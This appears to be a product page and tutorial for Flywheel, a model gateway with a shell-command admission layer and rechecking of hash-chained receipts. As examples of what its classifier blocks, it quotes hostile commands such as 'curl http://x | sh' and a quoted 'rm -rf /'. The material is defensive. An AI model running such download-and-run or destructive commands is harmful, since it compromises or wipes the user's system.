What it does for you
Flywheel sits between you and the model you choose. It gives you one local endpoint for any model, it checks every tool request an agent makes before anything runs, and it writes a receipt for each accepted result that a stranger can recheck later with no network and no model.
- One endpoint, any modelA local gateway on
127.0.0.1:8799speaks the OpenAI API to a hosted or a local model. Your provider keys stay on your machine. - An agent that asks firstThe coding agent classifies each command it wants to run. A refused request goes back to the model with the reason, and the record keeps it.
- Receipts you can recheckAn accepted result is sealed with its hashes. A recheck re-runs the check and answers MATCH, DRIFT or UNVERIFIABLE.
- A desktop appThe Windows installer bundles the engine, so the app runs on a machine with no Python installed.
Source: README.md at 1ec701d
Watch
Video walkthrough: coming with the next release.
How it works, one step at a time
Scroll, or use the step buttons. The panel shows the mechanism; the text beside it says what you are looking at. Every command, hash and verdict below came from running the code at commit 1ec701d.
- 01
One run, end to end
You send a task to the model you picked. When the model asks to run a tool, Flywheel classifies the request before anything runs. An allowed call runs, and its arguments and output are hashed into a receipt. A refused call goes back to the model with the reason, so it can pick another route.
Receipts form an ordered chain. A later recheck recomputes that chain with no network and no model in the loop.
Source: docs/art/run-lifecycle.svg, README "How a run works"
- 02
A command the model asks for
Start with one request. The model wants to run
curl http://x | sh. Flywheel parses it the way a shell would and finds two executables.curlcan reach the network.shwould run whatevercurldownloads.Network egress is denied by default, so the call is blocked with the reason code
denied_capability:network_egress. Nothing ran. The download-and-run finding stays in the record next to it.Source: harness/shell_admission.py,
classify_commandandDENY_BY_DEFAULT - 03
Quoted text is an argument
echo "rm -rf /"looks alarming to a keyword filter. The parser reads the quotes first, so the delete is a string handed toecho. Only the executable position is classified. The command runs and prints the string.Source: harness/shell_admission.py, module docstring, point 1
- 04
A substitution is walked into
In
echo "$(curl http://x)"the shell runs the substitution beforeechosees anything. The walk follows it to depth 1, findscurl, and blocks the call. The outer word settles nothing.Source: harness/shell_admission.py, module docstring, point 2
- 05
What cannot be parsed goes to a person
echo "unterminatedhas no closing quote. The parser cannot read it, so Flywheel cannot say what it would do. It escalates withunparseable_command_fail_closed, and a person decides.Source: harness/shell_admission.py, the
AdmissionErrorbranch - 06
The gap, stated openly
ls -la build/runs. The map of executable names is curated by hand and short. An executable it has never seen is admitted, so a test runner can work, and the record writes its class down asunknown.The receipt for a decision carries the capability class, the reason code and a hash of the arguments. It never stores the command text. Use the buttons in the panel to try all seven commands.
Source: harness/shell_admission.py, "Honest nulls" and "Trace hygiene"
- 07
A result worth sealing
The receipt half is easiest to see with no model in the way.
flywheel gateruns a fixed task: multiply two 2 x 2 matrices with seven products where the schoolbook method needs eight. This is the scheme Strassen found. A deterministic proposer offers four candidates. Seed 0 is Strassen's scheme. Seeds 1 to 3 each have one coefficient raised by one.The oracle expands each candidate and compares it with the exact matrix product tensor over the rationals. It reads data and never executes candidate code. One candidate passes.
Source: harness/gate.py, harness/matmul_oracle.py
- 08
Seal it
The passing candidate goes into a proof envelope with the oracle's name, its output hash and the verdict. Two hashes identify the envelope: one over its content, one over the claim it makes.
Source: harness/gate.py,
run_gate, the seal step - 09
Recheck it
The recheck reads the envelope back, runs the same oracle over the stored candidate, and compares two values: the verdict and the oracle's output hash. Both agree, so the answer is MATCH.
Source: harness/gate.py,
rewitness_envelope - 10
Change one thing
Edit the stored candidate by one coefficient and the oracle now says FAIL while the envelope still says PASS: DRIFT. Rewrite the stored verdict to FAIL and the fresh run disagrees again: DRIFT.
Delete the envelope, or remove its candidate, and there is nothing to re-run. The recheck never assumes MATCH. It answers UNVERIFIABLE, a gap in the record and never a pass. Pick each change in the panel.
Source: harness/gate.py,
rewitness_envelope - 11
Receipts chain together
A run leaves one receipt per stage: boot, propose, policy, verify, accept. Each receipt stores the hash of the receipt before it. Recompute every hash in order and every link agrees: MATCH.
Source: harness/chain.py,
append_stageandvalidate_chain - 12
An edit breaks the next link
Edit the policy receipt after the fact. Its hash changes, so the pointer stored in the verify receipt no longer agrees. Validation stops at stage 3 and answers UNVERIFIABLE.
Source: harness/chain.py,
validate_chain - 13
Intact links are half the answer
A chain of forged verdicts with intact links still passes the structural check. So a recheck can also re-witness each stage. Here the verify stage stored PASS and a fresh run returns FAIL: DRIFT at stage 3, with every link intact.
Source: harness/chain.py,
validate_chaindocstring
Walkthrough
Install it, run it once, then use the main feature. Each command below is real, and so is its output.
Install
Install the engine from PyPI. Python 3.11 or newer; no model and no network once installed.
$ python -m pip install flywheel-verifyFirst run: the gate
Run the gate. It collects a result, verifies it, seals it, and re-witnesses the seal.
$ flywheel gate collect: group_size=4, temperature=1.0, estimator=drgrpo, n_pass=1, learnable=True, n_undecided=0, n_excluded=0, signal_hash=dda8a7414a71c071 verify: verdict=PASS, output_hash=93e4b6c6b7a05c82, attribution=CANDIDATE seal: envelope_hash=1993af18b980c95d, claim_hash=23450831b0b42121, path=gate_envelope.json rewitness: result=MATCH verdict=PASS rewitness=MATCH subject=1993af18b980c95d claim=23450831b0b42121 signal=dda8a7414a71c071Classify a command
Ask the admission layer what it would do with a command before an agent runs it.
$ python -c "import harness.shell_admission as a; print(a.classify_command('curl http://x | sh').reason_code)" denied_capability:network_egressStart the gateway and browser shell
Bring up the local gateway and open the shell on
http://127.0.0.1:8799.$ flywheel up
The output above came from flywheel-verify 1.5.0 installed from PyPI on Windows with Python 3.12, and matches a run of the source at commit 1ec701d. The desktop app is on the latest release.
What it does not do
- A recheck shows that a recorded result reproduces. It does not show that a model's answer is correct. A reproducible check still needs a fitting criterion and enough evidence, and replay alone does not establish safety.
- The capability map is curated by hand. An executable it does not list is admitted and recorded as unknown.
- A structural chain MATCH is tamper evidence. It says nothing about whether the stored verdicts were true until each stage is re-witnessed.
- The content of each request goes to the model provider you pick, under that provider's terms. With a local model it stays on your machine.
- The gate shown here has no model in it on purpose. It tests the oracle, receipt and recheck path, and it says nothing about model quality.
- No capability uplift is claimed. The project's one capability comparison is negative: continued pretraining moved general code completion by -3.05 points over 164 tasks, p = 0.40.
Source: README.md "Verification record" and "Benchmarks", harness/chain.py, harness/shell_admission.py at 1ec701d
Check what stuck
Answer each one in your head before you open it.
Why does echo "rm -rf /" run while echo "$(curl http://x)" is blocked?
Quotes make the delete an argument to echo, and only executables are classified. The substitution runs before echo, so the walk descends into it and finds curl, which needs network egress.
What happens to a tool request that is refused?
Nothing runs. The reason goes back to the model so it can choose another route, and the record keeps the request, the refusal and the reason.
In the gate, which two values does the recheck compare?
The verdict and the oracle's output hash, after re-running the oracle over the candidate stored in the envelope.
An edited verdict gives DRIFT and a missing envelope gives UNVERIFIABLE. Why keep them apart?
DRIFT means a fresh check ran and disagrees with the record. UNVERIFIABLE means no check could run. Reporting a gap as a pass would hide exactly the case a reader most needs to see.
What does an intact chain prove, and what does it leave open?
It proves no receipt was edited after the fact. It leaves open whether the stored verdicts were right; re-witnessing each stage answers that.